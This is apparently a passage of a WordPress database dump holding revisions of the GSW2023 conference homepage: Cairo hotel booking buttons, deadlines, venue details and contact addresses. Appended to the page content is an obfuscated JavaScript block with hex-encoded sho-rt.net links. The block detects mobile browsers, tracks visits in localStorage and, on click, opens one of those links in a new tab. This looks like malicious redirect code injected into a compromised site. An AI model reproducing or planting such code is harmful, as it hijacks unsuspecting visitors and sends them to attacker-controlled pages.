2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687389829594{margin-top: 7px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\"> Novotel Cairo El Borg Hotel</span></h4>\n<p><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://cf.bstatic.com/xdata/images/hotel/max1024x768/222745005.jpg?k=18dfdc6ae56119c43bcff6e4a4f7f46814bcc54610f91414d64746d41bc2e9d0&amp;o=&amp;hp=1\" alt=\"Gallery image of this property\" width=\"249\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687390894260{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-23 20:49:27','2023-06-23 20:49:27','',3066,'https://gsw2023.com/?p=4756',0,'revision','',0),
(4757,4,'2023-06-23 20:49:32','2023-06-23 20:49:32','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span 